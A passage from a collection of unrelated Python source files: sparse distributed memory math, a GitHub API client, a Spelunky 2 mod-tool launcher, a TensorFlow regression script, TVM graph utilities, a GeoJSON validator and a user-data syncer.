in binary and continuous space and also convert between cosine similarity and hamming distance.
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import binom, norm
from scipy.sparse import csc_matrix, coo_matrix, csr_matrix
import pandas as pd
import scipy
from scipy.integrate import quad
import time
from scipy.special import comb
import torch
import torch.optim as optim
import torch.nn.functional as F
def softmax(x, beta):
assert len(x.shape) <3, 'this softmax can currently only handle vectors'
x = x * beta
return np.exp(x)/np.exp(x).sum()
def check_cosine_and_hamm_bounds(cosines, hamms, n):
"""
Ensuring conversion between cosine and hamming distance don't have
any numerical errors.
"""
if not torch.is_tensor(cosines):
cosines, hamms = np.asarray(cosines), np.asarray(hamms)
assert (hamms<0).sum() == 0 and (hamms > n).sum() == 0, "Hamm is out of bounds!"
assert (cosines>1).sum() == 0 and (cosines<-1).sum() == 0, "Cosine is out of bounds!"
def cosine_to_hamm(cosines, n):
if torch.is_tensor(cosines):
# some cosines are numerically unstable in being larger than 1.0 by a small epsilon...
# going to fix these.
numerical_error_inds = torch.logical_and(cosines>1, cosines < 1+ 1e-4)
cosines[numerical_error_inds] -=1e-4
hamms = n*(1-cosines)/2
hamms = torch.floor(hamms) if torch.is_tensor(cosines) else np.floor(hamms)
check_cosine_and_hamm_bounds(cosines, hamms, n)
return hamms
def hamm_to_cosine(hamms, n):
cosines = 1-(hamms*2/n)
check_cosine_and_hamm_bounds(cosines, hamms, n)
return cosines
def torch_hamm_dist(A, B):
"""
Assuming that A and B have patterns as vectors when input.
The columns of what is returned will be A compared with everything in B.
Therefore the order of what comes first is important!
"""
assert len(A.shape) == len(B.shape), "Need for A and B to be the same shape."
return torch.cdist(A.T.type(torch.float), B.T.type(torch.float), p=0).type(torch.int).T
### FUNCTIONS APPROXIMATING A KNOWN AND PROVIDED CIRCLE INTERSECTION:
def get_binary_and_continuous_caches(n, hamm_radius, r, cont_cache_resolution):
"""
Getting both the binary and continuous circle intersection results and caching them
to make the SDM experiments run much more efficiently.
"""
all_dvs = np.arange(0,n+1)
cached_intersects = expected_intersection_lune(n, all_dvs, hamm_radius, r)
cs_intervals = np.linspace(-1,1,cont_cache_resolution).astype(float)
cs_intervals[-1] = cs_intervals[-1] - 1e-15
log_continuous_cached_intersects = cap_intersection(n, cs_intervals, hamm_radius, r,
return_log=True,
ham_input=False, print_oobs=False)
return cached_intersects, log_continuous_cached_intersects
def fit_beta_regression(n, xvals, res, return_bias=False, ham_input=True):
""" Log linear regression to fit a beta coefficent to whatever is input."""
xvals = np.asarray(xvals)
res = np.asarray(res)
if ham_input:
xvals = hamm_to_cosine(xvals, n)
zeros_in_res = False
# need to remove any zeros for this calculation.
if res[-1] == 0.0:
print("res equals 0, problem for the log. Removing from the equation here.")
mask = res!=0.0
num_zeros = (res==0.0).sum()
res = res[mask]
xvals = xvals[mask]
zeros_in_res = True
yvals = np.log(np.asarray(res))
# log linear regression closed form solution.
beta = np.cov(xvals, yvals)[0][1] / np.var(xvals)
bias = np.mean(yvals) - beta*np.mean(xvals)
#mse between res and beta res:
#print('Beta Fit MSE:',np.sum((res-np.exp(beta*xvals)+bias)**2)/len(res) )
if return_bias:
return beta, bias
else:
return beta
def fit_softmax_backprop(n, dvals, targets, lr=0.3, niters=5000, ham_input=False, plot_losses=True):
"""
Learns an approximation to the circle intersection that is normalized. Ie fits a softmax function. This is unrealistic in
that it overfits to the softmax rather than the exponential approximation where the softmax is conditioned upon the number of inputs in the normalizing constant. But is still
interesting to analyze for what a perfect Beta fit to a particular softmax would be.
"""
#
targets = torch.Tensor(targets/sum(targets))
if ham_input:
xvals = torch.Tensor( hamm_to_cosine(dvals, n) )
else:
xvals = torch.Tensor(dvals)
beta = torch.nn.Parameter(torch.Tensor(np.random.uniform(1,30, 1)), requires_grad=True)
optimizer = optim.Adam([beta], lr=lr)
losses = []
for i in range(niters):
# training loop:
optimizer.zero_grad() # zero the gradient buffers
preds = F.softmax(beta*xvals)
loss = ((targets-preds)**2).sum() / len(dvals)
loss.backward()
optimizer.step()
losses.append(loss.item())
if plot_losses:
plt.figure()
plt.plot(losses)
plt.title("Losses during learning")
plt.show()
print("final loss", loss.item())
return beta.item()
def integral_func(phi, th1, n):
""" Used in computing the continuous hypersphere cap intersection below. """
return np.sin(phi)**(n-2) * scipy.special.betainc( (n-2)/2 , 1/2, 1-( (np.tan(th1))/(np.tan(phi)) )**2 )
def log_J_n(th1, th2, r, n):
""" Used in computing the continuous hypersphere cap intersection below. """
integral = quad(integral_func, th1, th2, args=(th1, n) )[0]
#print(np.log(np.pi**( (n-1) /2) ) , scipy.special.loggamma( (n-1) /2), np.log(r**(n-1)), np.log(integral ))
return np.log(np.pi**( (n-1) /2) ) - scipy.special.loggamma( (n-1) /2) + np.log(r**(n-1)) + np.log(integral )
def cap_intersection(n, cs_dvs, hamm_radius, r, rad=1,
return_log=False, ham_input = False, print_oobs=False):
"""
Computes the continuous hypersphere cap intersection.
Does all compute in log space for numerical stability, option to return
log results or not.
"""
#size of total space
log_total_space = log_hypersphere_sa(n,rad)
if r is not None:
if type(r) != int:
r = np.round(r) # number of neurons
r = float(r)
log_perc_addresses_w_neurons = np.log(r) - log_total_space
else:
log_perc_addresses_w_neurons = np.log(1e40) # a very large number of neurons
if ham_input:
cs_dvs = hamm_to_cosine(cs_dvs)
c_dist = hamm_to_cosine(hamm_radius,n)
t1 = t2 = np.arccos(c_dist)
log_inters = []
for cs_dv in cs_dvs:
tv = np.arccos(cs_dv)
if tv>=t1+t2 or t1+t2>(2*np.pi)-tv:
if print_oobs:
print("out of equation bounds", cs_dv)
log_inters.append(np.nan)
continue
tmin = np.arctan( (np.cos(t1)/(np.cos(t2)*np.sin(tv))) - (1/np.tan(tv)) )
assert np.round(tmin,5) == np.round(tv-tmin,5)
assert np.round(t2,5)==np.round(t1,5)
log_inters.append(2+log_J_n(tmin, t2, rad, n) )
log_inters = np.asarray(log_inters)
log_num_expected_neurons = log_inters + log_perc_addresses_w_neurons
if return_log:
# have not removed the nans either
log_num_expected_neurons = np.nan_to_num(log_num_expected_neurons, nan=-1e+30)
return log_num_expected_neurons
else:
num_expected_neurons = np.exp(log_num_expected_neurons)
num_expected_neurons = np.nan_to_num(num_expected_neurons, nan=0.0)
return num_expected_neurons
def log_hypersphere_sa(n, rad=1):
# n dim hypersphere surface area.
# https://en.wikipedia.org/wiki/Unit_sphere
# assuming L2 norm with r=1!
return np.log(2* (np.pi**(n/2) ) ) - scipy.special.loggamma(n/2) + np.log(rad**(n-1))
def hypersphere_v(n, r):
"""
Volume of a hypersphere. Not used but implemented.
"""
return (np.pi**(n/2) )/(scipy.special.gamma((n+1)/2) )*(r**n)
def expected_intersection_lune(n, dvals, hamm_radius, r):
# This equation gives the same results as the one we derive and present in the paper. It was introduced in the SDM book and runs a bit faster.
"""
Computes the fraction of the space that exists in the circle intersection using the Lune equation.
args::
n = space dimension
dvals = Hamm dist between circle centers
hamm_radius = hamming distance radius each circle uses
r = number of neurons
hard_mem_places = turns the fraction of the space in the
expected number of neurons
that exist in this fraction.
------------
returns::
res = list of floats for fraction of the space
"""
#ensure all are ints:
n = int(n)
hamm_radius = int(hamm_radius)
if r is not None:
r = int(r)
perc_addresses_w_neurons = r/(2**n)
else:
perc_addresses_w_neurons = 1.0
res = []
area = 0
# compute size of circle
for i in range(hamm_radius+1):
area += comb(n,i)
for d in dvals:
# compute lune
d = int(d)
lune = 0
for i in range(d):
j = i+1
if j%2==0:
continue
lune+= comb(j-1, (j-1)/2)*comb(n-j, hamm_radius-((j-1)/2))
intersect = area - lune
#print(d, intersect, area, lune, perc_addresses_w_neurons)
expected_intersect = np.log(intersect)+np.log(perc_addresses_w_neurons)
res.append(np.exp(expected_intersect))
res = np.asarray(res)
res = np.nan_to_num(res, nan=0.0)
return res
def expected_intersection_interpretable(n, dvals, hamm_radius, r, weight_type=None):
if r is None:
r = 1.0
perc_addresses_w_neurons = np.log(float(r)) - np.log(2.0**n)
res = []
for dval in dvals:
possible_addresses = 0
for a in np.arange(n-hamm_radius-(dval//2),n+0.1-dval):
# solve just for b then c is determined.
bvals = np.arange(np.maximum(0,n-hamm_radius-a), dval-(n-hamm_radius-a)+0.1) # +0.1 to ensure that the value here is represented.
#print(a, 'b values', bvals)
if len(bvals)==0:
continue
if weight_type == "Linear":
# linear weighting from the read and write operations.
weighting = ((a+bvals)/n) * ( (a+(dval-bvals))/n )
if weight_type == "Expo":
# linear weighting from the read and write operations.
weighting = np.exp(-0.01*(n-(a+bvals))) * np.exp(-0.01*(n-(a+(dval-bvals))))
elif not weight_type:
weighting = 1
possible_addresses += comb(n-dval,a)*(weighting*comb(dval,bvals)).sum()
expected_intersect = perc_addresses_w_neurons + np.log(possible_addresses)
res.append(np.exp(expected_intersect))
return np.asarray(res)
def space_frac_to_hamm_radius(n, space_frac_rang):
""" Computes the Hamming distance that should be used for a circle
to have an area that includes a given fraction of a given n
dimensional space.
args::
- n = space dimension
- space_frac_rang = list of space fractions to use
returns::
-list of hamming distances to use
"""
hamm_radiusances = []
for space_frac in space_frac_rang:
hamm_radiusances.append( int(binom.ppf(space_frac, n, 0.5)) )
return hamm_radiusances
def hamm_radius_to_space_frac(n, hamm_radius_rang):
""" Computes the space fraction $p$ that corresponds to a given Hamming distance input
args::
- n = space dimension
- space_frac_rang = list of Hamming distances used
returns::
- list of p fractions
"""
pfracs = []
for hd in hamm_radius_rang:
pfracs.append( binom.cdf(hd, n, 0.5) )
return pfracs
def plot_line(x, y, label_prefix, label_val, norm=True):
label = label_prefix
if label_val:
label +=str(label_val)
if norm:
y = y/sum(y)
plt.plot(x, y, label=label)
def label_plot(title, norm=True, directory="figures/Jaeckel_Analysis/", save_name=None):
plt.legend()
plt.title(title)
plt.xlabel('Hamming Distance Between Pattern and Query')
if norm:
plt.ylabel('Normalized overlap weights')
else:
plt.ylabel('Expected neurons in intersection')
if save_name:
plt.gcf().savefig(directory+save_name+'.png', dpi=250)
plt.show()
def SDM_Interpretable(params, dvals, thresholds, title=None, label_prefix='ham='):
"""Same as the SDM lune equation in results. Equation was inspired by Jaeckel's SDM Hyperplane but applied to the SDM setting with binary vectors and optimized by working out lower and upper bounds to avoid using a CSP. This equation is much more interpretable than the Lune one used in the SDM Appendix B.
See paper for the constraints and bounds explained."""
perc_addresses_w_neurons = np.log(params.r) - np.log(2.0**params.n)
for thresh in thresholds:
res = []
for dval in dvals:
possible_addresses = 0
#print('range of a vals', np.arange(params.n-thresh-(dval//2),params.n+1-dval))
for a in np.arange(params.n-thresh-(dval//2),params.n+0.1-dval):
# solve just for b then c is determined.
bvals = np.arange(np.maximum(0,params.n-thresh-a), dval-(params.n-thresh-a)+0.1) # +0.1 to ensure that the value here is represented.
#print(a, 'b values', bvals)
if len(bvals)==0:
continue
possible_addresses += comb(params.n-dval,a)*comb(dval,bvals).sum()
expected_intersect = perc_addresses_w_neurons + np.log(possible_addresses)
res.append(np.exp(expexcted_intersect))
res =np.asarray(res)
plot_line(dvals, res, label_prefix, thresh, params.norm)
if params.fit_beta_and_plot_attention:
fit_beta_res, beta = fit_beta_regression(params.n, dvals, res)
plot_line(dvals, fit_beta_res, 'fit_beta | '+label_prefix, thresh, params.norm)
if title: # else can call "label plot separately"
label_plot(title, params.norm)
return res
def SDM_lune(params, dvals, title=None, label_prefix='ham='):
"""Exact calculation for SDM circle intersection. For some reason mine is a slight upper bound on the results found in the book. Uses a proof from Appendix B of the SDM book (Kanerva, 1988). Difference is neglible when norm=True."""
res = expected_intersection_lune(params.n, dvals, params.hamm_radius, params.r )
if params.plot_lines:
plot_line(dvals, res, label_prefix, params.hamm_radius, params.norm)
if params.fit_beta_and_plot_attention:
fit_beta_res, beta = fit_beta_regression(params.n, dvals, res)
plot_line(dvals, fit_beta_res, 'fit_beta | '+label_prefix, params.hamm_radius, params.norm)
if title: # else can call "label plot separately"
label_plot(title, params.norm)
return res
def f(x, c_p):
"""This is used in the continuous approximation to the circle intersection derived in Appendix B of the SDM book that needs to be numerically integrated. It is less accurate than the exact equation we outline in the paper and use for our circle intersection computations in all figures and analyses unless otherwise noted."""
return 1/(2*np.pi*np.sqrt(x*(1-x)))*np.exp(-0.5*(c_p**2/(1-x)))
def expected_intersection_continuous(n, dvals, hamm_radius, r, hard_mem_places):
"""
Uses binary vector space with a continuous approximation from the SDM book that is inaccurate!
Computes the fraction of the space that exists in the circle intersection using the continuous approximation to the Lune equation.
args::
n = space dimension
dvals = Hamm dist between circle centers
hamm_radius = hamming distance radius each circle uses
r = number of neurons
hard_mem_places = turns the fraction of the space in the
expected number of neurons
that exist in this fraction.
------------
returns::
res = list of floats for fractions of the space or number of neurons present in this fraction depending if hard_mem_places is on.
"""
res = []
for dv in dvals:
c_p = (hamm_radius-(n/2))/np.sqrt(n/4)
intersect = quad(f, dv/n,1, args=(c_p))
num = intersect[0]
if hard_mem_places:
num*=r
res.append(num)
return res | python |
import json
import sys
from concurrent.futures import ThreadPoolExecutor, Future
from urllib3.connectionpool import HTTPSConnectionPool, HTTPResponse
from urllib3.exceptions import NewConnectionError, MaxRetryError, HTTPError
from typing import Dict, List, Any
from string import Template
class NetMod:
_instance = None
__pool: HTTPSConnectionPool
__pool_size: int = 5
__api_base: str = 'api.github.com'
__port: int = 443
__timeout: float = 5.0
__repo_route: Template = Template('/repos/$repo')
__user_route: Template = Template('/users/$user')
__org_route: Template = Template('/users/$user/orgs')
"""
explicitly request v3 of the API
https://docs.github.com/en/rest/overview/resources-in-the-rest-api#current-version
"""
__headers: Dict[str, str] = {
'Accept': 'application/vnd.github.v3+json',
'User-Agent': 'Python-urllib/3',
'Authorization': ''
}
"""
referenced from
https://python-patterns.guide/gang-of-four/singleton/
"""
def __new__(cls, *args, **kwargs):
if cls._instance is None:
cls._instance = super(NetMod, cls).__new__(cls)
return cls._instance
def __init__(self):
self.__pool = HTTPSConnectionPool(host=NetMod.__api_base, maxsize=NetMod.__pool_size, headers=NetMod.__headers,
timeout=NetMod.__timeout, port=NetMod.__port, block=True)
def __make_request(self, api_route: str, method: str = 'get') -> Dict[str, Any]:
try:
response: HTTPResponse = self.__pool.request(method, api_route, release_conn=True, redirect=True)
res_data = json.loads(response.data)
if response.status != 200:
raise HTTPError(response.status, res_data['message'])
return res_data
except (NewConnectionError, MaxRetryError):
sys.exit("""Failed to connect. Exiting...""")
except HTTPError as err:
sys.exit(err)
def fetch_repos_data(self, repos: List[str]) -> Dict[str, Any]:
api_routes = [self.__repo_route.substitute(repo=repo) for repo in repos]
return self.__fetch_all__concurrent(repos, api_routes)
def fetch_users_data(self, users: List[str]) -> Dict[str, Any]:
api_routes = [self.__user_route.substitute(user=user) for user in users]
return self.__fetch_all__concurrent(users, api_routes)
def fetch_org_data(self, user: str) -> Dict[str, Any]:
api_route = self.__org_route.substitute(user=user)
return self.__make_request(api_route)
def __fetch_all__concurrent(self, entries: List[str], api_routes: List[str]) -> Dict[str, Any]:
max_workers = max(len(entries), self.__pool_size)
with ThreadPoolExecutor(max_workers=max_workers) as executor:
res: Dict[str, Future[Dict[str, Any]]] = {entry: executor.submit(self.__make_request, route) for
entry, route in
zip(entries, api_routes)}
return {user: data.result() for user, data in res.items()}
| python |
import argparse
import logging
import sys
from pathlib import Path
import requests
from flask import Flask
from packaging import version
from .views.assets import blueprint as assets_blueprint
from .views.index import blueprint as index_blueprint
PROCESS_NAME = "Spel2.exe"
# Setup static files to work with onefile exe
BASE_DIR = Path(__file__).resolve().parent
APP_DIR = BASE_DIR
ROOT_DIR = BASE_DIR.parent.parent
if hasattr(sys, "_MEIPASS"):
BASE_DIR = BASE_DIR / getattr(sys, "_MEIPASS")
APP_DIR = Path(sys.executable).resolve().parent
ROOT_DIR = BASE_DIR
app = Flask(
__name__,
static_folder=f"{BASE_DIR / 'static'}",
template_folder=f"{BASE_DIR / 'templates'}",
)
app.register_blueprint(index_blueprint)
app.register_blueprint(assets_blueprint, url_prefix="/assets")
def get_latest_version():
try:
return version.parse(
requests.get(
"https://api.github.com/repos/spelunky-fyi/modlunky2/releases/latest"
).json()["tag_name"]
)
except Exception: # pylint: disable=broad-except
return None
def get_current_version():
with (ROOT_DIR / "VERSION").open() as version_file:
return version.parse(version_file.read().strip())
def main():
parser = argparse.ArgumentParser(description="Tool for modding Spelunky 2.")
parser.add_argument(
"--host", type=str, default="127.0.0.1", help="The host to listen on."
)
parser.add_argument("--port", type=int, default=8040, help="Port to listen on.")
parser.add_argument("--debug", default=False, action="store_true")
parser.add_argument(
"--process-name",
default=PROCESS_NAME,
help="Name of Spelunky Process. (Default: %(default)s",
)
parser.add_argument(
"--install-dir",
default=APP_DIR,
help="Path to Spelunky 2 installation. (Default: %(default)s",
)
args = parser.parse_args()
log_format = "%(asctime)s: %(message)s"
logging.basicConfig(format=log_format, level=logging.INFO, datefmt="%H:%M:%S")
try:
app.config.SPELUNKY_INSTALL_DIR = Path(args.install_dir)
app.config.MODLUNKY_CURRENT_VERSION = get_current_version()
app.config.MODLUNKY_LATEST_VERSION = get_latest_version()
app.config.MODLUNKY_NEEDS_UPDATE = (
app.config.MODLUNKY_CURRENT_VERSION < app.config.MODLUNKY_LATEST_VERSION
)
app.run(host=args.host, port=args.port, debug=args.debug)
except Exception as err: # pylint: disable=broad-except
input(f"Failed to start ({err}). Press enter to exit... :(")
| python |
import pandas as pd
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow.keras import Model
from tensorflow.keras.layers import Dense
import numpy as np
import os
# We set seeds for reproduciability
tf.random.set_seed(1)
np.random.seed(1)
url = 'https://archive.ics.uci.edu/ml/machine-learning-databases/autos/imports-85.data'
# download the data from given URL and with given columns
columns = ['symbolying','normalized-losses', 'make', 'fuel-type', 'aspiration', 'num-of-doors', 'body-style', 'drive-wheels', 'engine-location'
,'wheel-base', 'length', 'width', 'height', 'curb-weight', 'engine-type', 'num-of-cylinders', 'engine-size', 'fuel-system'
,'bore', 'stroke', 'compression-ratio', 'horsepower', 'peak-rpm', 'city-mpg', 'highway-mpg', 'price']
#loading the dataset using pandas and replacing "?" with NA values
raw_data = pd.read_csv(url,names=columns,na_values="?")
#We ignore 'symboling' column
raw_data.pop('symbolying')
#drop all rows with missing values
dataset = raw_data.dropna().copy()
# we perform min-max normalization as the following
norm_data = dataset.loc[:,["wheel-base","length","width","height","curb-weight","engine-size","bore","stroke","compression-ratio","horsepower","peak-rpm","city-mpg","highway-mpg","price"]].copy()
norm_data_mins = norm_data.min()
norm_data_maxs = norm_data.max()
normalized_features =(norm_data-norm_data_mins)/(norm_data_maxs - norm_data_mins)
dataset.loc[:,["wheel-base","length","width","height","curb-weight","engine-size","bore","stroke","compression-ratio","horsepower","peak-rpm","city-mpg","highway-mpg","price"]] = normalized_features.loc[:,["wheel-base","length","width","height","curb-weight","engine-size","bore","stroke","compression-ratio","horsepower","peak-rpm","city-mpg","highway-mpg","price"]]
dataset = pd.get_dummies(dataset,columns=["num-of-cylinders","num-of-doors","make","fuel-type","aspiration","body-style","drive-wheels"
,"engine-location","engine-type","fuel-system"],
prefix=["num-of-cylinders","num-of-doors","make","fuel-type","aspiration","body-style","drive-wheels"
,"engine-location","engine-type","fuel-system"],prefix_sep='_')
# We set 80% of the available data for training and the rest for testing
train_dataset = dataset.sample(frac = 0.8, random_state=1)
test_dataset = dataset.drop(train_dataset.index)
train_features = train_dataset.copy()
test_features = test_dataset.copy()
train_labels = train_features.pop('normalized-losses')
test_labels = test_features.pop('normalized-losses')
# Working with such small dataset, it is better to train the model sample by sample for it to converge quickly
batch_size = 1
train_ds = tf.data.Dataset.from_tensor_slices((np.array(train_features),np.log(np.array(train_labels)))).batch(batch_size)
test_ds = tf.data.Dataset.from_tensor_slices((np.array(test_features),np.log(np.array(test_labels)))).batch(batch_size)
class Regression_Model(Model):
def __init__(self):
super(Regression_Model,self).__init__()
self.dense1 = Dense(64, activation='relu' )
self.dense2 = Dense(32, activation='relu' )
self.dense3 = Dense(16, activation='relu' )
self.final = Dense(1)
def call(self,x):
x = self.dense1(x)
x = self.dense2(x)
x = self.dense3(x)
return self.final(x)
class Trainer:
def __init__(self):
self.model:Regression_Model = Regression_Model()
self.loss = self.get_loss()
self.optimizer = self.get_optimizer("SGD")
self.train_loss = tf.keras.metrics.Mean(name='train_loss')
self.test_loss = tf.keras.metrics.Mean(name='test_loss')
def get_optimizer(self,opt="adam"):
lr_schedule = tf.keras.optimizers.schedules.InverseTimeDecay(0.1,decay_steps=10000,decay_rate=1,staircase=False)
if opt == 'adam':
return tf.keras.optimizers.Adam(0.001)
elif opt == 'SGD':
return tf.keras.optimizers.SGD(lr_schedule)
else:
raise "This optimizer does not exist"
def get_loss(self,loss='MSE'):
if loss == 'MSE':
return tf.keras.losses.MSE
if loss == 'MAE':
return tf.keras.losses.MAE
else:
raise "error"
def predict(self,features):
return self.model.predict(features)
@tf.function
def train_step(self,features,values):
with tf.GradientTape() as tape:
predictions = self.model(features,training = True)
loss = self.loss(values,predictions)
gradients = tape.gradient(loss,self.model.trainable_variables)
self.optimizer.apply_gradients(zip(gradients,self.model.trainable_variables))
self.train_loss(loss)
@tf.function
def test_step(self,features,values):
predictions = self.model(features,training=False)
loss = self.loss(values,predictions)
self.test_loss(loss)
def train(self):
for epoch in range(100):
self.train_loss.reset_states()
self.test_loss.reset_states()
for features,values in train_ds:
self.train_step(features,values)
for features,values in test_ds:
self.test_step(features,values)
print(
f'Epoch {epoch + 1}, '
f'Loss: {self.train_loss.result()}, '
f'Test Loss: {self.test_loss.result()}, '
)
# Now we reset the random seeds for reproduciability and start the training!
os.environ['PYTHONHASHSEED']=str(1)
tf.random.set_seed(1)
np.random.seed(1)
trainer = Trainer()
trainer.train()
# lets see th esummary of the trained model
trainer.model.summary()
# Now we test the model on the test set
predictions = np.exp(np.reshape(trainer.model.predict(np.array(test_features)),(np.shape(test_features)[0],)))
mse = (np.square(predictions - test_labels)).mean()
percentage = np.mean(np.abs(predictions - test_labels)/(test_labels))
print("mean squared error is {} and the percentage is {}".format(mse,percentage))
#Our deep neural ntwork model achieved a mean squared error of 226.68 (15.05 RMSE) and a percentage Error of 9.35%.
plt.plot(predictions)
plt.plot(np.array(test_labels))
plt.legend(labels = ["predictions","labels"])
plt.show() | python |
# Aula 20 - 05-12-2019
# Analise de dados superficial
# Dica: Para este formulário será necessário usar um metodo para string novo.
# Vocês já conhecem o .strip() que remove os caracteres especiais \n do final
# da string. o .splint('') que quebra a string em uma lista conforme o caracteres
# que tem dentro das aspas.
# O metodo novo para este exercico é o .replace('{velho}','{novo}') - O velho
# é um caracter que queira substituir e o novo é o caracter que deseja incluir.
# Exemplo pelo shell do pyton:
# >>> 'agua verde mar'.replace('a','A')
# 'AguA verde mAr'
# >>> 'agua verde mar'.replace('a','')
# 'gu verde mr'
# Como vemos, no primeiro exemplo o caracter "a" foi substituido pelo "A"
# e no segundo exemplo o "a" foi removido da string.
# Exercicio!
# Fazer usando funções
# O setor de Marketing da AMBEV criou uma pesquisa de mercado sobre gostos.
# https://forms.gle/PLuAZXpmpBvE1vkX7
# Para analisar os dados desta pesquisa, foi solicita para a HBSIS realizar
# a analise deste dados!
# O nome do arquivo é Formulário.csv
# Deste arquivo deverá sair os seguintes dados:
# Quantas pessoas gostam de cerveja?
# R:
# Quantas pessoas gostam de refrigerante?
# R:
# Quantas pessoas gostam de cerveja e refigerante?
# R:
# Quantas pessoas participaram desta pesquisa?
# R:
# Qual a marca de cerveja que os participantes preferem?
# R:
# Quantos do sexo feminino gostam de bolacha?
# R:
# Quantas mulheres gostam de cerveja?
# R:
# Quantos menores de idade gostam de cerveja?
# R:
# Quantas mulheres gostam de beber cerveja e refrigerante?
# R:
| python |
# pylint: disable=invalid-name
"""Utility function to get information from graph."""
from __future__ import absolute_import as _abs
import tvm
from . import graph_attr
def infer_shape(graph, **shape):
"""Infer the shape given the shape of inputs.
Parameters
----------
graph : Graph
The graph to perform shape inference from
shape : dict of str to tuple
The specific input shape.
Returns
-------
in_shape : list of tuple
Shape of inputs
out_shape: list of tuple
Shape of outputs
"""
graph = graph_attr.set_shape_inputs(graph, shape)
graph = graph.apply("InferShape")
shape = graph.json_attr("shape")
index = graph.index
input_shape = [shape[index.entry_id(x)] for x in index.input_names]
output_shape = [shape[index.entry_id(x)] for x in index.output_entries]
return input_shape, output_shape
def infer_dtype(graph, **dtype):
"""Infer the type given the typeS of inputs.
Parameters
----------
graph : Graph
The graph to perform type inference from
dtype : dict of str to dtype
The specific input data type.
Returns
-------
in_dtype : list of tuple
Dtype of inputs
out_dtype: list of tuple
Dtype of outputs
"""
graph = graph_attr.set_dtype_inputs(graph, dtype)
graph = graph.apply("InferType")
dtype = graph.json_attr("dtype")
index = graph.index
input_dtype = [graph_attr.TCODE_TO_DTYPE[dtype[index.entry_id(x)]]
for x in index.input_names]
output_dtype = [graph_attr.TCODE_TO_DTYPE[dtype[index.entry_id(x)]]
for x in index.output_entries]
return input_dtype, output_dtype
_deep_compare = tvm.get_global_func("nnvm.graph.DeepCompare")
def check_graph_equal(grapha, graphb, compare_variable_attrs=False):
"""Check if two graphs have equal structure.
Parameters
----------
grapha : Graph
The first graph
graphb : Graph
The second graph
compare_variable_attrs : bool, optional
Whether we want to compare attributes(names) on variables.
Usually it is safe to skip it unless we want input name
to exactly match
Raises
------
ValueError
ValueError is raised with error message when graph not equal
"""
err = _deep_compare(grapha, graphb, compare_variable_attrs)
if err:
raise ValueError("Graph compare error: " + err)
| python |
BLACK = '\033[30m'
RED = '\033[31m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
BLUE = '\033[34m'
MAGENTA = '\033[35m'
CYAN = '\033[36m'
GRAY = '\033[90m'
WHITE = '\033[37m'
UNDERLINE = '\033[4m'
END = '\033[0m' | python |
# -*- coding: utf-8 -*-
"""
.. module:: Backend.utils
:platform: Unix, Windows
.. moduleauthor:: Aki Mäkinen <[email protected]>
"""
__author__ = 'Aki Mäkinen'
s_codes = {
"OK": 200,
"BAD": 400,
"UNAUTH": 401,
"FORBIDDEN": 403,
"NOTFOUND": 404,
"METHODNOTALLOWED": 405,
"TEAPOT": 418,
"INTERNALERROR": 500
}
_geojson_feature_fields = {
"type": {
"_self_": (unicode(), True),
"_values_": ["Feature"]
},
"geometry": {
"_self_": (dict(), True),
"type": {
"_self_": (unicode(), True),
"_values_": ["Point"]
},
"coordinates": {
"_self_": (list(), True),
"_elements_": float(),
"_elementcount_": 2
}
},
"properties": {
"_self_": (dict(), True),
"metadata": {
"_self_": (dict(), False),
"status": (unicode(), True),
"info": (unicode(), True)
}
},
"id": (unicode(), True)
}
_geojson_featurecollection_fields = {
"type": (unicode(), True), # Field key hard coded in validation
"totalFeatures": (int(), False),
"features": {
"_self_": (list(), True),
"_elements_": _geojson_feature_fields
} # Field key hard coded in validation
}
def geo_json_scheme_validation(jsondict):
"""
A simple GeoJSON validator.
Uses the GeoJSON definitions described in LBD JSON Formats document.
JSON format is described as python dictionary, where the key specifies the name of a JSON field and
value describes if the field/value is required and what is the type of the value. There are some special
key values: _self_ (if the value is list or embedded document), _elements_ (if the value is a list, this describes
the element type) and _elementcount_ (restricts how many elements list can have).
.. note::
This function is a if-else hell... and the JSON format document is outdated.
:param jsondict: GeoJSON formatted Python dictionary containing either GeoJSON Feature or FeatureCollection.
:return Boolean: True or False depending on the result of the validation
"""
if not isinstance(jsondict, dict):
return False
if "type" in jsondict:
# Check that the given itemdict follows the given format.
# Stops at the first error returning False
def check_items(itemdict, itemformat):
for key, value in itemformat.iteritems():
if isinstance(value, tuple):
if value[1] == True and key not in itemdict:
return False
elif key in itemdict:
if not isinstance(itemdict[key], type(value[0])):
return False
elif key.lower() in [k.lower() for k in itemdict]:
return False
else:
pass
elif isinstance(value, dict):
if value["_self_"][1] == True and key not in itemdict:
return False
elif key in itemdict:
if isinstance(value["_self_"][0], list):
if "_elementcount_" in value:
if not len(itemdict[key]) == value["_elementcount_"]:
return False
if isinstance(value["_elements_"], dict):
itemlist = itemdict[key]
newitemformat = dict(value["_elements_"])
for item in itemlist:
result = check_items(item, newitemformat)
if not result:
return False
else:
for listitem in itemdict[key]:
if not isinstance(listitem, type(value["_elements_"])):
return False
elif isinstance(value["_self_"][0], dict):
newitemdict = itemdict[key]
newitemformat = dict(value)
del newitemformat["_self_"]
result = check_items(newitemdict, newitemformat)
if not result:
return False
else:
if isinstance(itemdict[key], type(value["_self_"][0])):
if "_values_" in value:
try:
if itemdict[key].lower() not in [v.lower() for v in value["_values_"]]:
return False
except AttributeError:
if itemdict[key] not in value["_values_"]:
return False
else:
return False
elif key in [k.lower() for k in itemdict]:
return False
else:
pass
else:
return False
return True
if jsondict["type"].lower() == "featurecollection":
result = check_items(jsondict, _geojson_featurecollection_fields)
elif jsondict["type"].lower() == "feature":
result = check_items(jsondict, _geojson_feature_fields)
else:
return False
else:
result = False
return result
def flattener(dicti, parent):
"""
Dictionary flattener
Flattens a dictionary and... Ok I don't remember what this is for.
Creates once iterable list.
:param dicti: Dictionary to be flattened
:param parent: Parent element of the dictionary
"""
for k, v in dicti.iteritems():
if isinstance(v, dict):
if parent is None:
father = k
else:
father = parent + "." + k
for item in flattener(v, father):
yield item
else:
if parent is not None:
yield parent + "." + k
else:
yield k | python |
import logging
from common.DataSyncer import DataSyncer
from common.logger import initialize_logger
from models.User import User
logger = logging.getLogger(__name__)
initialize_logger(logger)
class UserPartialSyncer:
"""
Sync only latest users info from API to db
"""
def __init__(self):
self.dataSyncer = DataSyncer('https://api.bgm.tv/user/', User, 435000, 9)
def calculate_incremental_scraping_range(self):
# get current user with maximum id in database
current_max_id_user = self.dataSyncer.databaseExecutor.session \
.query(User) \
.order_by(User.id.desc()) \
.first()
current_user_max_id = current_max_id_user.id \
if current_max_id_user is not None else 0
